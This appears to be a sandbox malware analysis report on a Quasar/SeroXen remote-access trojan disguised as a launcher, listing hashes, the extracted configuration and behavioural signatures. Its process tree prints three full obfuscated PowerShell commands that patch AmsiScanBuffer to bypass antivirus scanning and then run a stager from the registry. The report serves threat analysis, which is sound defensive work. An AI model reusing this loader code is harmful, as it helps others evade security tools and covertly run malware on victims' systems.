Overview

overview

10

Static

static

10

Guna.UI2.dll

windows11-21h2-x64

1

Mono.Cecil.dll

windows11-21h2-x64

1

Mono.Nat.dll

windows11-21h2-x64

1

Octokit.dll

windows11-21h2-x64

1

Seroxen la....2.exe

windows11-21h2-x64

10

Siticone.D...UI.dll

windows11-21h2-x64

1

Unity.Burs...fe.dll

windows11-21h2-x64

1

Unity.Burst.dll

windows11-21h2-x64

1

Unity.Mathematics.dll

windows11-21h2-x64

1

Unity.ProB...ee.dll

windows11-21h2-x64

1

Unity.ProB...ri.dll

windows11-21h2-x64

1

Unity.ProBuilder.dll

windows11-21h2-x64

1

UnityEngin...le.dll

windows11-21h2-x64

1

UnityEngin...le.dll

windows11-21h2-x64

1

UnityEngin...le.dll

windows11-21h2-x64

1

UnityEngin...le.dll

windows11-21h2-x64

1

UnityEngin...le.dll

windows11-21h2-x64

1

UnityEngin...le.dll

windows11-21h2-x64

1

UnityEngin...le.dll

windows11-21h2-x64

1

UnityEngin...le.dll

windows11-21h2-x64

1

UnityEngin...le.dll

windows11-21h2-x64

1

UnityEngin...le.dll

windows11-21h2-x64

1

UnityEngin...le.dll

windows11-21h2-x64

1

UnityEngin...le.dll

windows11-21h2-x64

1

UnityEngin...le.dll

windows11-21h2-x64

1

UnityEngin...le.dll

windows11-21h2-x64

1

UnityEngin...le.dll

windows11-21h2-x64

1

UnityEngin...le.dll

windows11-21h2-x64

1

UnityEngin...le.dll

windows11-21h2-x64

1

UnityEngin...le.dll

windows11-21h2-x64

1

UnityEngin...le.dll

windows11-21h2-x64

1

UnityEngin...le.dll

windows11-21h2-x64

1

Resubmissions

12-06-2024 04:46

240612-feblss1ejn 10

05-05-2024 21:44

240505-1lv91aeg6z 10

05-05-2024 21:21

240505-z7h15aec4t 10

Analysis

  • max time kernel
    1050s
  • max time network
    801s
  • platform
    windows11-21h2_x64
  • resource
    win11-20240426-en
  • resource tags

    arch:x64arch:x86image:win11-20240426-enlocale:en-usos:windows11-21h2-x64system
  • submitted
    05-05-2024 21:21

Sharing

Copy URL
Twitter E-mail
Report Analysis Logs

General

  • Target

    Seroxen launcher v3.1.2.exe

  • Size

    1.3MB

  • MD5

    a30b4df046ff1aeaa9bc6aeb650dd9aa

  • SHA1

    538b3248c00d43b6371d88151d43b4e95012da5f

  • SHA256

    268067fee4b2cab61138bcaa62402c1aeb68d6db3c92f23be88b6c61071a0ec7

  • SHA512

    91c175b4543eba084b32f79b3f4fdb144c47d78eecf7955a4eab0409c03bdf7d275aa25f13aa592fc7d307af1d351746793bb632d7621597273bae294d06ee73

  • SSDEEP

    24576:N7njFX9ew/1bffPrhEqE0r+UPffBhffffffffffjhKhrfQjsRw:tFNb/lffPrhEqtr+UPffBhfffffffff9

Score
10/10
agentteslaquasarseroxenkeyloggerspywarestealertrojan

Malware Config

Extracted

Family

quasar

Version

3.1.5

Botnet

SeroXen

C2

127.0.0.1:4782

Mutex

$Sxr-GV6wZsGZZMeZ3qfenc

Attributes
  • encryption_key

    1AdT9W7jx39uAeL7gd1n

  • install_name

    Client.exe

  • log_directory

    Logs

  • reconnect_delay

    2

  • startup_key

    Quasar Client Startup

  • subdirectory

    SubDir

Signatures

  • AgentTesla

    Agent Tesla is a remote access tool (RAT) written in visual basic.

    keyloggertrojanstealerspywareagenttesla
  • Quasar RAT

    Quasar is an open source Remote Access Tool.

    trojanspywarequasar
  • Quasar payload 4 IoCs
  • Suspicious use of NtCreateProcessExOtherParentProcess 1 IoCs
  • Suspicious use of NtCreateUserProcessOtherParentProcess 3 IoCs
  • AgentTesla payload 1 IoCs
  • Checks BIOS information in registry 2 TTPs 2 IoCs

    BIOS information is often read in order to detect sandboxing environments.

  • Executes dropped EXE 6 IoCs
  • Legitimate hosting services abused for malware hosting/C2 1 TTPs 4 IoCs
  • Looks up external IP address via web service 1 IoCs

    Uses a legitimate IP lookup service to find the infected system's external IP.

  • Drops file in System32 directory 12 IoCs
  • Suspicious use of SetThreadContext 3 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Checks processor information in registry 2 TTPs 13 IoCs

    Processor information is often read in order to detect sandboxing environments.

  • Creates scheduled task(s) 1 TTPs 2 IoCs

    Schtasks is often used by malware for persistence or to perform post-infection execution.

    persistence
  • Enumerates system info in registry 2 TTPs 16 IoCs
  • Modifies Internet Explorer settings 1 TTPs 4 IoCs
    adwarespyware
  • Modifies data under HKEY_USERS 64 IoCs
  • Modifies registry class 64 IoCs
  • Suspicious behavior: AddClipboardFormatListener 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 64 IoCs
  • Suspicious behavior: GetForegroundWindowSpam 3 IoCs
  • Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary 9 IoCs
  • Suspicious use of AdjustPrivilegeToken 64 IoCs
  • Suspicious use of FindShellTrayWindow 31 IoCs
  • Suspicious use of SendNotifyMessage 64 IoCs
  • Suspicious use of SetWindowsHookEx 16 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs

Processes

  • C:\Windows\system32\winlogon.exe
    winlogon.exe
    1⤵
      PID:644
      • C:\Windows\system32\dwm.exe
        "dwm.exe"
        2⤵
          PID:432
        • C:\Windows\System32\dllhost.exe
          C:\Windows\System32\dllhost.exe /Processid:{1a07d4f8-abe6-4441-9abc-545ca62ee5d5}
          2⤵
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          • Suspicious use of WriteProcessMemory
          PID:2244
        • C:\Windows\System32\dllhost.exe
          C:\Windows\System32\dllhost.exe /Processid:{b6f377e4-7c54-49f5-8587-879911d2ec8a}
          2⤵
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          PID:4696
        • C:\Windows\System32\dllhost.exe
          C:\Windows\System32\dllhost.exe /Processid:{d1d17d4f-8797-40b0-aacf-cdbbaffcd32e}
          2⤵
            PID:5028
        • C:\Windows\system32\lsass.exe
          C:\Windows\system32\lsass.exe
          1⤵
            PID:700
          • C:\Windows\system32\svchost.exe
            C:\Windows\system32\svchost.exe -k DcomLaunch -p -s LSM
            1⤵
              PID:984
            • C:\Windows\System32\svchost.exe
              C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p -s lmhosts
              1⤵
                PID:1048
              • C:\Windows\System32\svchost.exe
                C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s NcbService
                1⤵
                  PID:1056
                • C:\Windows\system32\svchost.exe
                  C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s TimeBrokerSvc
                  1⤵
                    PID:1064
                  • C:\Windows\system32\svchost.exe
                    C:\Windows\system32\svchost.exe -k netsvcs -p -s Schedule
                    1⤵
                    • Drops file in System32 directory
                    PID:1132
                    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE
                      C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE "function Local:aXPqkUYBfFXs{Param([OutputType([Type])][Parameter(Position=0)][Type[]]$cQJBtieABikgWK,[Parameter(Position=1)][Type]$uqQkEWtNbZ)$jyboOLmOlln=[AppDomain]::CurrentDomain.DefineDynamicAssembly((New-Object Reflection.AssemblyName(''+[Char](82)+''+[Char](101)+''+[Char](102)+''+'l'+''+[Char](101)+''+[Char](99)+''+'t'+'e'+[Char](100)+''+[Char](68)+''+[Char](101)+''+[Char](108)+''+'e'+'g'+'a'+''+[Char](116)+''+[Char](101)+'')),[Reflection.Emit.AssemblyBuilderAccess]::Run).DefineDynamicModule('I'+[Char](110)+''+[Char](77)+''+'e'+''+[Char](109)+''+[Char](111)+''+[Char](114)+''+[Char](121)+''+[Char](77)+''+'o'+''+[Char](100)+'u'+[Char](108)+''+[Char](101)+'',$False).DefineType('My'+[Char](68)+''+'e'+'leg'+[Char](97)+'te'+[Char](84)+''+[Char](121)+'p'+'e'+'',''+'C'+''+[Char](108)+''+[Char](97)+''+[Char](115)+''+[Char](115)+''+[Char](44)+''+[Char](80)+''+[Char](117)+'b'+[Char](108)+''+[Char](105)+'c,'+'S'+''+'e'+''+'a'+''+[Char](108)+''+'e'+'d'+','+'An'+'s'+''+[Char](105)+''+'C'+''+'l'+''+'a'+''+'s'+''+[Char](115)+''+[Char](44)+'A'+[Char](117)+'toC'+[Char](108)+'as'+[Char](115)+'',[MulticastDelegate]);$jyboOLmOlln.DefineConstructor('R'+'T'+''+[Char](83)+''+'p'+''+'e'+'c'+'i'+''+[Char](97)+''+[Char](108)+''+[Char](78)+'am'+'e'+''+','+''+'H'+''+[Char](105)+''+[Char](100)+''+[Char](101)+''+'B'+''+[Char](121)+''+[Char](83)+''+'i'+''+[Char](103)+',P'+[Char](117)+'b'+[Char](108)+'i'+[Char](99)+'',[Reflection.CallingConventions]::Standard,$cQJBtieABikgWK).SetImplementationFlags(''+'R'+''+'u'+''+[Char](110)+''+'t'+''+[Char](105)+''+'m'+''+[Char](101)+''+[Char](44)+''+[Char](77)+'a'+'n'+''+[Char](97)+''+[Char](103)+''+[Char](101)+''+[Char](100)+'');$jyboOLmOlln.DefineMethod(''+[Char](73)+''+[Char](110)+''+[Char](118)+''+'o'+''+[Char](107)+''+'e'+'',''+[Char](80)+'u'+[Char](98)+'l'+[Char](105)+'c'+[Char](44)+''+[Char](72)+'i'+[Char](100)+''+'e'+''+[Char](66)+'yS'+[Char](105)+''+'g'+''+','+''+[Char](78)+''+[Char](101)+'w'+'S'+'l'+'o'+''+[Char](116)+''+[Char](44)+'Vi'+[Char](114)+''+[Char](116)+''+[Char](117)+''+'a'+''+[Char](108)+'',$uqQkEWtNbZ,$cQJBtieABikgWK).SetImplementationFlags(''+[Char](82)+''+'u'+'nt'+[Char](105)+''+[Char](109)+''+[Char](101)+''+[Char](44)+''+[Char](77)+''+[Char](97)+''+'n'+''+'a'+'ge'+[Char](100)+'');Write-Output $jyboOLmOlln.CreateType();}$iuJSgkAvSVOkP=([AppDomain]::CurrentDomain.GetAssemblies()|Where-Object{$_.GlobalAssemblyCache -And $_.Location.Split('\')[-1].Equals(''+[Char](83)+'y'+'s'+''+[Char](116)+'e'+[Char](109)+'.'+[Char](100)+''+[Char](108)+'l')}).GetType('Mic'+'r'+''+[Char](111)+'s'+'o'+'f'+[Char](116)+''+[Char](46)+''+'W'+''+'i'+'n'+[Char](51)+''+[Char](50)+''+[Char](46)+''+[Char](85)+'ns'+[Char](97)+'f'+[Char](101)+'Na'+'t'+''+'i'+''+[Char](118)+''+[Char](101)+''+[Char](77)+''+'e'+''+[Char](116)+'h'+[Char](111)+''+[Char](100)+''+[Char](115)+'');$PkgvyBEzpKLGdF=$iuJSgkAvSVOkP.GetMethod(''+[Char](71)+''+[Char](101)+'tP'+[Char](114)+''+[Char](111)+''+[Char](99)+'A'+[Char](100)+''+[Char](100)+''+[Char](114)+'e'+[Char](115)+''+[Char](115)+'',[Reflection.BindingFlags](''+[Char](80)+''+[Char](117)+''+[Char](98)+''+[Char](108)+''+[Char](105)+''+[Char](99)+''+','+''+'S'+'t'+[Char](97)+''+'t'+''+[Char](105)+'c'),$Null,[Reflection.CallingConventions]::Any,@((New-Object IntPtr).GetType(),[string]),$Null);$wGZYEByzeACYSZSwLwQ=aXPqkUYBfFXs @([String])([IntPtr]);$thAvEOQkvhslGDpcTogJwO=aXPqkUYBfFXs @([IntPtr],[UIntPtr],[UInt32],[UInt32].MakeByRefType())([Bool]);$zTpIAWQJsXH=$iuJSgkAvSVOkP.GetMethod(''+[Char](71)+''+'e'+''+[Char](116)+''+[Char](77)+''+[Char](111)+'duleHan'+'d'+'l'+'e'+'').Invoke($Null,@([Object](''+'k'+''+'e'+'rn'+[Char](101)+''+'l'+''+'3'+''+[Char](50)+'.'+'d'+''+[Char](108)+''+[Char](108)+'')));$VoABFPorzDNcbZ=$PkgvyBEzpKLGdF.Invoke($Null,@([Object]$zTpIAWQJsXH,[Object](''+[Char](76)+''+[Char](111)+''+'a'+'d'+[Char](76)+'i'+'b'+''+'r'+''+[Char](97)+''+'r'+'y'+[Char](65)+'')));$WQDxcjfTcDkIwvnFe=$PkgvyBEzpKLGdF.Invoke($Null,@([Object]$zTpIAWQJsXH,[Object]('V'+'i'+''+[Char](114)+''+'t'+'u'+[Char](97)+''+'l'+''+[Char](80)+''+[Char](114)+''+[Char](111)+'t'+[Char](101)+''+[Char](99)+'t')));$ppnHFyn=[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($VoABFPorzDNcbZ,$wGZYEByzeACYSZSwLwQ).Invoke('a'+[Char](109)+''+'s'+'i.d'+'l'+''+[Char](108)+'');$USNvIWvMAoHZgpjAW=$PkgvyBEzpKLGdF.Invoke($Null,@([Object]$ppnHFyn,[Object](''+[Char](65)+'m'+[Char](115)+''+[Char](105)+''+[Char](83)+''+'c'+'a'+[Char](110)+'Bu'+[Char](102)+''+[Char](102)+''+'e'+''+'r'+'')));$pfMQasKpfc=0;[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($WQDxcjfTcDkIwvnFe,$thAvEOQkvhslGDpcTogJwO).Invoke($USNvIWvMAoHZgpjAW,[uint32]8,4,[ref]$pfMQasKpfc);[Runtime.InteropServices.Marshal]::Copy([Byte[]](0xb8,0x57,0,7,0x80,0xc3),0,$USNvIWvMAoHZgpjAW,6);[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($WQDxcjfTcDkIwvnFe,$thAvEOQkvhslGDpcTogJwO).Invoke($USNvIWvMAoHZgpjAW,[uint32]8,0x20,[ref]$pfMQasKpfc);[Reflection.Assembly]::Load([Microsoft.Win32.Registry]::LocalMachine.OpenSubkey(''+[Char](83)+''+[Char](79)+''+[Char](70)+''+'T'+''+[Char](87)+'A'+[Char](82)+''+[Char](69)+'').GetValue(''+[Char](36)+''+'7'+'7'+[Char](115)+'t'+[Char](97)+''+[Char](103)+''+'e'+''+'r'+'')).EntryPoint.Invoke($Null,$Null)"
                      2⤵
                      • Suspicious use of NtCreateUserProcessOtherParentProcess
                      • Drops file in System32 directory
                      • Suspicious use of SetThreadContext
                      • Modifies data under HKEY_USERS
                      • Suspicious behavior: EnumeratesProcesses
                      • Suspicious use of AdjustPrivilegeToken
                      • Suspicious use of WriteProcessMemory
                      PID:4664
                    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE
                      C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE "function Local:TichINfMvoQw{Param([OutputType([Type])][Parameter(Position=0)][Type[]]$vqNRLWOySskuJa,[Parameter(Position=1)][Type]$cAjmvpKArK)$slKOJoBrIlO=[AppDomain]::CurrentDomain.DefineDynamicAssembly((New-Object Reflection.AssemblyName('Re'+'f'+''+[Char](108)+'ecte'+[Char](100)+''+[Char](68)+''+[Char](101)+'l'+'e'+''+[Char](103)+'a'+[Char](116)+'e')),[Reflection.Emit.AssemblyBuilderAccess]::Run).DefineDynamicModule('I'+[Char](110)+'Me'+[Char](109)+''+'o'+''+[Char](114)+'yM'+'o'+'du'+[Char](108)+''+[Char](101)+'',$False).DefineType(''+[Char](77)+'y'+[Char](68)+''+[Char](101)+''+[Char](108)+''+[Char](101)+'ga'+[Char](116)+'eT'+'y'+''+[Char](112)+'e',''+[Char](67)+''+[Char](108)+''+[Char](97)+'s'+'s'+''+[Char](44)+'P'+'u'+''+'b'+''+[Char](108)+''+[Char](105)+''+[Char](99)+''+[Char](44)+''+[Char](83)+'ea'+[Char](108)+'e'+[Char](100)+''+[Char](44)+''+'A'+''+'n'+''+'s'+''+'i'+''+'C'+''+[Char](108)+''+[Char](97)+'s'+'s'+''+[Char](44)+''+[Char](65)+''+[Char](117)+''+'t'+''+[Char](111)+''+[Char](67)+''+'l'+''+[Char](97)+''+'s'+'s',[MulticastDelegate]);$slKOJoBrIlO.DefineConstructor('R'+[Char](84)+'S'+'p'+''+[Char](101)+'c'+[Char](105)+''+'a'+''+[Char](108)+''+[Char](78)+'ame'+[Char](44)+''+'H'+''+[Char](105)+''+[Char](100)+''+'e'+''+[Char](66)+''+[Char](121)+''+[Char](83)+'i'+[Char](103)+''+','+''+[Char](80)+''+[Char](117)+'bl'+[Char](105)+''+[Char](99)+'',[Reflection.CallingConventions]::Standard,$vqNRLWOySskuJa).SetImplementationFlags(''+[Char](82)+''+'u'+''+[Char](110)+''+[Char](116)+'im'+[Char](101)+','+'M'+''+[Char](97)+''+[Char](110)+'ag'+[Char](101)+'d');$slKOJoBrIlO.DefineMethod(''+'I'+''+[Char](110)+'v'+[Char](111)+''+'k'+''+[Char](101)+'',''+[Char](80)+''+[Char](117)+'b'+[Char](108)+''+'i'+''+'c'+''+[Char](44)+''+[Char](72)+''+[Char](105)+''+'d'+'eB'+[Char](121)+''+'S'+''+[Char](105)+''+[Char](103)+''+[Char](44)+''+[Char](78)+'e'+'w'+''+[Char](83)+''+[Char](108)+''+'o'+''+[Char](116)+''+[Char](44)+''+[Char](86)+''+'i'+''+'r'+''+'t'+''+[Char](117)+''+'a'+''+'l'+'',$cAjmvpKArK,$vqNRLWOySskuJa).SetImplementationFlags(''+[Char](82)+''+[Char](117)+'n'+'t'+''+[Char](105)+''+[Char](109)+''+[Char](101)+''+','+'Ma'+'n'+''+'a'+'g'+'e'+''+[Char](100)+'');Write-Output $slKOJoBrIlO.CreateType();}$hqiHDrYnCXzNC=([AppDomain]::CurrentDomain.GetAssemblies()|Where-Object{$_.GlobalAssemblyCache -And $_.Location.Split('\')[-1].Equals(''+[Char](83)+''+'y'+''+[Char](115)+''+[Char](116)+''+[Char](101)+''+[Char](109)+''+'.'+''+'d'+''+[Char](108)+'l')}).GetType(''+'M'+''+[Char](105)+'c'+[Char](114)+''+[Char](111)+''+[Char](115)+''+[Char](111)+''+[Char](102)+''+[Char](116)+''+[Char](46)+''+'W'+''+'i'+''+'n'+''+[Char](51)+''+[Char](50)+'.'+[Char](85)+''+[Char](110)+''+'s'+''+[Char](97)+''+[Char](102)+''+[Char](101)+''+[Char](78)+''+[Char](97)+''+'t'+''+[Char](105)+'v'+[Char](101)+''+'M'+''+[Char](101)+''+[Char](116)+''+[Char](104)+''+[Char](111)+''+'d'+'s');$vKYOqdlgVaOLFJ=$hqiHDrYnCXzNC.GetMethod(''+[Char](71)+''+[Char](101)+''+[Char](116)+''+'P'+''+[Char](114)+''+[Char](111)+''+'c'+''+'A'+''+[Char](100)+''+[Char](100)+''+[Char](114)+'es'+'s'+'',[Reflection.BindingFlags](''+'P'+''+[Char](117)+'b'+[Char](108)+''+'i'+''+'c'+','+[Char](83)+''+'t'+''+[Char](97)+''+'t'+''+[Char](105)+''+[Char](99)+''),$Null,[Reflection.CallingConventions]::Any,@((New-Object IntPtr).GetType(),[string]),$Null);$LRiHXFlwhmEGzpBtGhB=TichINfMvoQw @([String])([IntPtr]);$vjgnmKHoAVnttDEwyoPBWF=TichINfMvoQw @([IntPtr],[UIntPtr],[UInt32],[UInt32].MakeByRefType())([Bool]);$ByKPOPHcZjU=$hqiHDrYnCXzNC.GetMethod('G'+[Char](101)+''+[Char](116)+''+'M'+''+'o'+'d'+'u'+'leH'+'a'+''+[Char](110)+''+[Char](100)+''+[Char](108)+'e').Invoke($Null,@([Object](''+[Char](107)+'e'+[Char](114)+''+[Char](110)+''+'e'+''+[Char](108)+''+[Char](51)+'2'+'.'+''+[Char](100)+''+[Char](108)+''+[Char](108)+'')));$TwpQQWRnevEnBu=$vKYOqdlgVaOLFJ.Invoke($Null,@([Object]$ByKPOPHcZjU,[Object](''+[Char](76)+''+[Char](111)+''+[Char](97)+''+'d'+''+[Char](76)+''+'i'+''+'b'+'rar'+[Char](121)+''+[Char](65)+'')));$TVqUbZCnDeLDNxpzL=$vKYOqdlgVaOLFJ.Invoke($Null,@([Object]$ByKPOPHcZjU,[Object](''+[Char](86)+''+[Char](105)+'r'+[Char](116)+''+[Char](117)+''+[Char](97)+'l'+[Char](80)+''+[Char](114)+''+[Char](111)+''+[Char](116)+''+[Char](101)+'c'+[Char](116)+'')));$WaXsJVG=[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($TwpQQWRnevEnBu,$LRiHXFlwhmEGzpBtGhB).Invoke('a'+[Char](109)+'s'+[Char](105)+''+[Char](46)+''+[Char](100)+''+'l'+''+[Char](108)+'');$umqEnrzilGmtBtlpO=$vKYOqdlgVaOLFJ.Invoke($Null,@([Object]$WaXsJVG,[Object](''+[Char](65)+'m'+[Char](115)+''+[Char](105)+''+'S'+''+[Char](99)+''+[Char](97)+''+'n'+'B'+'u'+'f'+'f'+'e'+'r'+'')));$iOLXUtEEtH=0;[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($TVqUbZCnDeLDNxpzL,$vjgnmKHoAVnttDEwyoPBWF).Invoke($umqEnrzilGmtBtlpO,[uint32]8,4,[ref]$iOLXUtEEtH);[Runtime.InteropServices.Marshal]::Copy([Byte[]](0xb8,0x57,0,7,0x80,0xc3),0,$umqEnrzilGmtBtlpO,6);[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($TVqUbZCnDeLDNxpzL,$vjgnmKHoAVnttDEwyoPBWF).Invoke($umqEnrzilGmtBtlpO,[uint32]8,0x20,[ref]$iOLXUtEEtH);[Reflection.Assembly]::Load([Microsoft.Win32.Registry]::LocalMachine.OpenSubkey(''+[Char](83)+''+[Char](79)+'F'+[Char](84)+''+[Char](87)+'A'+[Char](82)+''+[Char](69)+'').GetValue(''+'$'+''+'7'+''+'7'+''+'s'+''+[Char](116)+''+'a'+''+[Char](103)+''+[Char](101)+'r')).EntryPoint.Invoke($Null,$Null)"
                      2⤵
                      • Suspicious use of NtCreateUserProcessOtherParentProcess
                      • Drops file in System32 directory
                      • Suspicious use of SetThreadContext
                      • Modifies data under HKEY_USERS
                      • Suspicious behavior: EnumeratesProcesses
                      • Suspicious use of AdjustPrivilegeToken
                      PID:4344
                      • C:\Windows\System32\Conhost.exe
                        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                        3⤵
                          PID:696
                      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE
                        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE "function Local:ukqiNOkwfzfb{Param([OutputType([Type])][Parameter(Position=0)][Type[]]$XSKAxlhTxikMiI,[Parameter(Position=1)][Type]$eDwodqMEbS)$XNYWKcUReBF=[AppDomain]::CurrentDomain.DefineDynamicAssembly((New-Object Reflection.AssemblyName('R'+[Char](101)+''+[Char](102)+''+[Char](108)+''+'e'+'c'+[Char](116)+''+[Char](101)+'d'+[Char](68)+'e'+[Char](108)+''+[Char](101)+''+[Char](103)+''+[Char](97)+'te')),[Reflection.Emit.AssemblyBuilderAccess]::Run).DefineDynamicModule(''+[Char](73)+''+'n'+'M'+[Char](101)+''+[Char](109)+''+[Char](111)+''+'r'+''+[Char](121)+'M'+[Char](111)+''+[Char](100)+''+[Char](117)+''+'l'+''+[Char](101)+'',$False).DefineType(''+[Char](77)+''+[Char](121)+''+[Char](68)+''+[Char](101)+''+[Char](108)+''+[Char](101)+''+'g'+''+[Char](97)+'teTy'+'p'+''+[Char](101)+'','C'+'l'+''+[Char](97)+''+[Char](115)+''+[Char](115)+''+','+''+[Char](80)+''+'u'+'b'+'l'+''+'i'+'c'+[Char](44)+''+[Char](83)+''+[Char](101)+'a'+[Char](108)+''+[Char](101)+''+[Char](100)+''+[Char](44)+''+'A'+''+'n'+''+'s'+''+[Char](105)+''+'C'+''+'l'+''+'a'+'s'+'s'+''+[Char](44)+''+[Char](65)+''+[Char](117)+''+'t'+''+[Char](111)+'C'+[Char](108)+''+'a'+'s'+[Char](115)+'',[MulticastDelegate]);$XNYWKcUReBF.DefineConstructor(''+[Char](82)+''+[Char](84)+''+[Char](83)+''+[Char](112)+''+'e'+''+'c'+''+[Char](105)+''+'a'+''+[Char](108)+''+'N'+''+[Char](97)+''+[Char](109)+'e'+[Char](44)+'Hide'+[Char](66)+''+'y'+'S'+[Char](105)+'g'+','+''+'P'+''+[Char](117)+'b'+'l'+''+'i'+'c',[Reflection.CallingConventions]::Standard,$XSKAxlhTxikMiI).SetImplementationFlags(''+[Char](82)+''+'u'+''+[Char](110)+''+'t'+'i'+[Char](109)+'e,Ma'+[Char](110)+''+[Char](97)+''+'g'+'e'+'d'+'');$XNYWKcUReBF.DefineMethod(''+[Char](73)+''+[Char](110)+'v'+[Char](111)+''+'k'+''+'e'+'',''+[Char](80)+'ub'+[Char](108)+'i'+'c'+''+','+'Hi'+[Char](100)+''+[Char](101)+''+[Char](66)+''+[Char](121)+''+[Char](83)+'ig'+','+''+[Char](78)+''+[Char](101)+''+'w'+''+'S'+'l'+[Char](111)+'t'+[Char](44)+''+'V'+''+[Char](105)+''+'r'+'t'+[Char](117)+''+[Char](97)+''+[Char](108)+'',$eDwodqMEbS,$XSKAxlhTxikMiI).SetImplementationFlags(''+[Char](82)+''+'u'+''+[Char](110)+''+[Char](116)+''+'i'+''+[Char](109)+''+[Char](101)+''+','+''+[Char](77)+''+[Char](97)+'n'+[Char](97)+'g'+[Char](101)+''+[Char](100)+'');Write-Output $XNYWKcUReBF.CreateType();}$ZfFuTFchQNNoJ=([AppDomain]::CurrentDomain.GetAssemblies()|Where-Object{$_.GlobalAssemblyCache -And $_.Location.Split('\')[-1].Equals(''+'S'+''+[Char](121)+'stem'+[Char](46)+''+[Char](100)+'l'+'l'+'')}).GetType(''+[Char](77)+''+[Char](105)+'c'+[Char](114)+''+'o'+''+'s'+''+[Char](111)+''+[Char](102)+'t.W'+'i'+''+'n'+''+'3'+''+[Char](50)+''+[Char](46)+'Un'+[Char](115)+'af'+'e'+'N'+'a'+''+[Char](116)+'i'+'v'+'eMet'+'h'+''+[Char](111)+''+[Char](100)+''+[Char](115)+'');$QpwsHMkdZrLTIs=$ZfFuTFchQNNoJ.GetMethod(''+'G'+'et'+[Char](80)+''+'r'+''+[Char](111)+'cA'+[Char](100)+''+[Char](100)+''+[Char](114)+'e'+'s'+''+[Char](115)+'',[Reflection.BindingFlags](''+[Char](80)+''+[Char](117)+''+[Char](98)+''+[Char](108)+''+'i'+''+[Char](99)+',S'+[Char](116)+''+'a'+''+[Char](116)+''+[Char](105)+''+'c'+''),$Null,[Reflection.CallingConventions]::Any,@((New-Object IntPtr).GetType(),[string]),$Null);$yGOOeXGUDlEwgdGSMlr=ukqiNOkwfzfb @([String])([IntPtr]);$VxatSEigbxRqECqiwiruTE=ukqiNOkwfzfb @([IntPtr],[UIntPtr],[UInt32],[UInt32].MakeByRefType())([Bool]);$igseMAFZlNZ=$ZfFuTFchQNNoJ.GetMethod(''+'G'+'e'+[Char](116)+''+[Char](77)+''+[Char](111)+''+[Char](100)+''+[Char](117)+'l'+[Char](101)+''+'H'+''+[Char](97)+''+'n'+'dl'+[Char](101)+'').Invoke($Null,@([Object](''+'k'+''+'e'+'r'+'n'+''+[Char](101)+'l'+'3'+''+[Char](50)+''+'.'+''+'d'+''+[Char](108)+'l')));$VciKXKtgOxQtZg=$QpwsHMkdZrLTIs.Invoke($Null,@([Object]$igseMAFZlNZ,[Object](''+'L'+'oad'+[Char](76)+''+[Char](105)+''+[Char](98)+''+[Char](114)+''+'a'+''+[Char](114)+'yA')));$krGJXTuMZfDymfpgn=$QpwsHMkdZrLTIs.Invoke($Null,@([Object]$igseMAFZlNZ,[Object](''+[Char](86)+''+'i'+''+'r'+''+[Char](116)+''+'u'+''+'a'+''+[Char](108)+''+[Char](80)+''+[Char](114)+'o'+[Char](116)+''+[Char](101)+''+[Char](99)+''+'t'+'')));$gOiRzXO=[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($VciKXKtgOxQtZg,$yGOOeXGUDlEwgdGSMlr).Invoke(''+[Char](97)+'m'+'s'+''+'i'+''+'.'+''+'d'+''+'l'+''+[Char](108)+'');$dQMVAdQcLnDGighQT=$QpwsHMkdZrLTIs.Invoke($Null,@([Object]$gOiRzXO,[Object](''+[Char](65)+''+[Char](109)+''+'s'+''+[Char](105)+''+[Char](83)+''+'c'+'a'+[Char](110)+''+'B'+''+'u'+'f'+[Char](102)+''+[Char](101)+''+[Char](114)+'')));$UfWxiQHhmP=0;[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($krGJXTuMZfDymfpgn,$VxatSEigbxRqECqiwiruTE).Invoke($dQMVAdQcLnDGighQT,[uint32]8,4,[ref]$UfWxiQHhmP);[Runtime.InteropServices.Marshal]::Copy([Byte[]](0xb8,0x57,0,7,0x80,0xc3),0,$dQMVAdQcLnDGighQT,6);[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($krGJXTuMZfDymfpgn,$VxatSEigbxRqECqiwiruTE).Invoke($dQMVAdQcLnDGighQT,[uint32]8,0x20,[ref]$UfWxiQHhmP);[Reflection.Assembly]::Load([Microsoft.Win32.Registry]::LocalMachine.OpenSubkey(''+'S'+''+[Char](79)+''+'F'+''+'T'+''+[Char](87)+'A'+'R'+'E').GetValue('$'+[Char](55)+'7'+[Char](115)+''+'t'+'a'+[Char](103)+'e'+'r'+'')).EntryPoint.Invoke($Null,$Null)"
                        2⤵
                        • Suspicious use of NtCreateUserProcessOtherParentProcess
                        • Drops file in System32 directory
                        • Suspicious use of SetThreadContext
                        • Modifies data under HKEY_USERS
                        PID:1896
                        • C:\Windows\System32\Conhost.exe
                          \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                          3⤵
                            PID:5032
                      • C:\Windows\system32\svchost.exe
                        C:\Windows\system32\svchost.exe -k LocalService -p -s nsi
                        1⤵
                          PID:1196
                        • C:\Windows\System32\svchost.exe
                          C:\Windows\System32\svchost.exe -k netprofm -p -s netprofm
                          1⤵
                            PID:1272
                          • C:\Windows\system32\svchost.exe
